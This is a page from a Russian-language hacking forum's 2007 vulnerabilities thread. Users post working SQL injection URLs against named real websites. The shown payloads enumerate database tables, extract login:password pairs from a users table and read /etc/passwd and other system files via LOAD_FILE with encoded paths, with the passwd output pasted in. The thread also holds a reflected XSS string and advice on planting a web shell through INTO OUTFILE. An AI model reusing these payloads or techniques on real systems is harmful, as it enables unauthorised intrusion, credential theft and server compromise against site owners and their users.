ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 19 из 1393 « Первая < 9 15 16 17 18 19 20 21 22 23 29691195191019 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #181  
Старый 27.09.2007, 16:12
SUBJECT617
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462

Репутация: 91
Отправить сообщение для SUBJECT617 с помощью ICQ
По умолчанию
smroqt?lnb`kg ...

И еще неизвестно сколько будет дальше...

После 16го символа пошли одни нули.... Тоесть я > поменял на = так можно? Это значит что всего 16 символов?

smroqt?lnb`kgnrs

Вот что вышло, и что это такое я сбрутил? Куда это совать?)

И еще если я сбрутил из version() первые три символа 4-0 значит ли это что версия 4.0?
Последний раз редактировалось SUBJECT617; 27.09.2007 в 18:09..
 

  #182  
Старый 29.09.2007, 17:51
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940

Репутация: 1257


Отправить сообщение для mr.The с помощью ICQ
По умолчанию
вопросег. есть ли тут[http://www.lipetsk.ru/sites/catalogue.html?category=-1+union+select+1,2,3,4,5,6,7,8/*] SQl-ing ? и как раскрутить?

поля подбирал с помощью "order by". ошибку не показывает но догадоццо что она есть можна.
и ещё. если сделать так http://www.lipetsk.ru/sites/catalogue.html?category=-1+'><script>alert('XSS')</script><'
то будут пасив xss
 

  #183  
Старый 30.09.2007, 08:45
V1k
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137

Репутация: 201
По умолчанию
mr.The
Первый параметр выводится в href а-тега.
Чтобы каждый раз не искать результат в сурсе страницы, можно закрывать тег из самой инъекции.
Код:
http://www.lipetsk.ru/sites/catalogue.html?pass=1&backurl=/sites/catalogue.html&category=null+union+select+concat('\'>',table_schema,'.',table_name,'<a '),0,0,0,0,0,0,0+from+information_schema.tables/*
http://www.lipetsk.ru/sites/catalogue.html?pass=1&backurl=/sites/catalogue.html&category=null+union+select+concat('\'>',login,':',password,'<a '),0,0,0,0,0,0,0+from+www2.auth_users/*
 

  #184  
Старый 30.09.2007, 14:26
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940

Репутация: 1257


Отправить сообщение для mr.The с помощью ICQ
По умолчанию
V1k
пасиба!
 

  #185  
Старый 30.09.2007, 15:25
VentRu
Новичок
Регистрация: 27.09.2007
Сообщений: 11
Провел на форуме:
142777

Репутация: 4
По умолчанию
http://www.ksu.ru/f16/index.php?id=10&idm=0'&id_news=-1+union+select+1,2,3,4,database(),6,7,8,9,10,11/*

Выводит имя базы, пользователя и версию. Подобрать названия таблиц что-то не получается. Что можете посоветовать кроме XSS?
 

  #186  
Старый 30.09.2007, 16:57
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию
Да ничего не могу, единственное вот страница админа -
http://www.ksu.ru/archeol/ceramics/index.phtml?flag=1&k=0
попробуй подобрать что-нибудь... А так там ЛОАД_ФАЙЛ не работает, разве что попробуй шелл залить через into outfile, только надо подобрать хотябы одну таблицу, любую...
 

  #187  
Старый 30.09.2007, 16:59
VentRu
Новичок
Регистрация: 27.09.2007
Сообщений: 11
Провел на форуме:
142777

Репутация: 4
По умолчанию
Да я сам пробовал лоад файл. Увы, не помогло. Спасибо за совет.
 

  #188  
Старый 02.10.2007, 11:39
n3m0
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
Провел на форуме:
6373157

Репутация: 247
Отправить сообщение для n3m0 с помощью ICQ
По умолчанию
Подскажите, что дальше делать?
http://www.nap.edu/topics.php?topic=350+union+select+1,2,3,4,5,6,7,8, 9,10,11
 

  #189  
Старый 02.10.2007, 11:51
halkfild
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию
http://www.nap.edu/topics.php?topic=-350+union+select+1,2,LOAD_FILE(CHAR(46,46,47,46,46 ,47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7 ,8,9,10,11/*


Цитата:
Root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
и тд..

ftpusers
Цитата:
http://www.nap.edu/topics.php?topic=-350+union+select+1,2,LOAD_FILE(0x2f6574632f686f737 473),4,5,6,7,8,9,10,11/*
syslog.conf
Цитата:
http://www.nap.edu/topics.php?topic=-350+union+select+1,2,LOAD_FILE(0x2f6574632f7365727 669636573),4,5,6,7,8,9,10,11/*
Последний раз редактировалось halkfild; 02.10.2007 в 12:04..
 

  #190  
Старый 02.10.2007, 12:15
phol1eadeux
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900

Репутация: 138
По умолчанию
Цитата:
Сообщение от n3m0  
Спасибо. Где можна почитать про Load_file(char()) ??
А что тут непонятного. Главное знать какой файл открывать. При фильтрации ковычек кодируешь строку
 
 
Страница 19 из 1393 « Первая < 9 15 16 17 18 19 20 21 22 23 29691195191019 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ